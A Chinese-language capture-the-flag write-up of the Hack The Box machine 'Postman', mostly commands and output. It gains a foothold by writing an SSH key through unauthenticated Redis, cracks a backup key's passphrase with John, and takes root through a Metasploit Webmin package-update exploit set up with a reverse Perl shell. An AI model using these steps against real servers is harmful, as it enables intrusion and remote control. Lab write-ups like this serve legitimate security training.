HTB-Postman

由 admin 发布

靶机描述

清单

  • 信息搜集

    • nmap
    • redis 未授权
    • ssh2john
  • 提权

    • webmin

信息搜集

靶机IP

image-20210505153313330

端口扫描

nmap -sS -sV -p- -T4 10.10.10.160

Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

80

image-20210505135401702

6379

╭─[y2my] as root in ~/Desktop/htb                                                                                                   13:45:46
╰──➤  redis-cli -h 10.10.10.160
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis"

redis 是不需要密码链接的

10000 https

image-20210505135347450

简单的搜索了一下,发现有过命令执行的漏洞,但需要账号密码

漏洞利用

redis

1、生成ssh密钥

ssh-keygen -t rsa 一路回车

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
/root/.ssh/id_rsa already exists.
Overwrite (y/n)? y
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:+3fgZMoPBM6LWuJ+6NiNizuJUuqL02IntpjU00SN1y0 root@y2my
The key's randomart image is:
+---[RSA 3072]----+
|                 |
|      o . .      |
|     o o.E .     |
|    . .o ..      |
|     .  S .      |
|  o o  . +  +    |
| * +.oo o..= .   |
|X=+*o*.  .o.o .  |
|O*O=Oo.   .o..   |
+----[SHA256]-----+

生成的密钥内容为

cat ~/.ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHM5GKgcYzAq8sjDoXoQFCqYST19bG/RfDhkri9Ez3EoyHHn4cAbay9Q9QoTjvmtW40fpkD5omjtpogTCNQ0ai15aeg9tk6z0xlG4FO40fSooqZryJzAFvKKGXrjIek4nOguOc4mfl0I+QbJTaQQKAA4kb4j2BlsoMvCV/a3U7V3+nQ+sCuRJRDGLj2KK/RueY3r+TktFwOcPtXPEy0DEO0j99LFikzVOjbY9FEXyuA9BtVpyh4r0L8IvrawbJS6kQ7rfiRr3JM87C5ogZdknk160vmal+I8pp/TYq81y68f/PCqS9TGt4JaC+DiAQZt+OjZAdZJDGylorR2MNIoqyqLnMELTPhsiCw2EmejY814jMLStaVrwYuL6FUGbl/LSDdWc43UNKgtIVyrFiZrVOETLz8XUMYHoK/t/YZqYp43Vl2UtB0qfmm3jj4xcW0pWnp0di8JSmITWXqB1RLydrJVx+U30bn8WK5mPjxO7guooC4qWAMhC4i6kUnTGo54c= root@y2my

2、设置 ssh密钥

10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
10.10.10.160:6379> config set dbfilename authorized_keys
OK
10.10.10.160:6379> set x "\n\n\n ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHM5GKgcYzAq8sjDoXoQFCqYST19bG/RfDhkri9Ez3EoyHHn4cAbay9Q9QoTjvmtW40fpkD5omjtpogTCNQ0ai15aeg9tk6z0xlG4FO40fSooqZryJzAFvKKGXrjIek4nOguOc4mfl0I+QbJTaQQKAA4kb4j2BlsoMvCV/a3U7V3+nQ+sCuRJRDGLj2KK/RueY3r+TktFwOcPtXPEy0DEO0j99LFikzVOjbY9FEXyuA9BtVpyh4r0L8IvrawbJS6kQ7rfiRr3JM87C5ogZdknk160vmal+I8pp/TYq81y68f/PCqS9TGt4JaC+DiAQZt+OjZAdZJDGylorR2MNIoqyqLnMELTPhsiCw2EmejY814jMLStaVrwYuL6FUGbl/LSDdWc43UNKgtIVyrFiZrVOETLz8XUMYHoK/t/YZqYp43Vl2UtB0qfmm3jj4xcW0pWnp0di8JSmITWXqB1RLydrJVx+U30bn8WK5mPjxO7guooC4qWAMhC4i6kUnTGo54c= root@y2my \n\n\n"
OK
10.10.10.160:6379> save

3、保存之后就可以连接了

ssh -i ~/.ssh/id_rsa redis@10.10.10.160

Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$ 

redis -> Matt

在查询 redis 用户历史命令时找到

image-20210505145344719

1、寻找该文件

redis@Postman:~$ find / -name "id_rsa.bak" -ls 2>/dev/null
   158996      4 -rwxr-xr-x   1 Matt     Matt         1743 Aug 26  2019 /opt/id_rsa.bak

该文件是属于 Matt 用户的,猜测可能为Matt的密钥

2、破解密码

python2 ssh2john.py id_rsa > mattpasswd

cat mattpasswd

john mattpasswd --wordlist=/usr/share/wordlists/rockyou.txt

Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa)
1g 0:00:00:16 DONE (2021-05-05 14:21) 0.05917g/s 848621p/s 848621c/s 848621C/sa6_123..*7¡Vamos!
Session completed

得到 computer2008

登陆 webmin 得到版本为

image-20210505153218313

root

方法一使用 msf

exploit/linux/http/webmin_packageup_rce

msf6 exploit(linux/http/webmin_packageup_rce) > show options 

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   computer2008     yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.160     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME   Matt             yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.12      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

得到root

image-20210505145710884


暂无评论

发表评论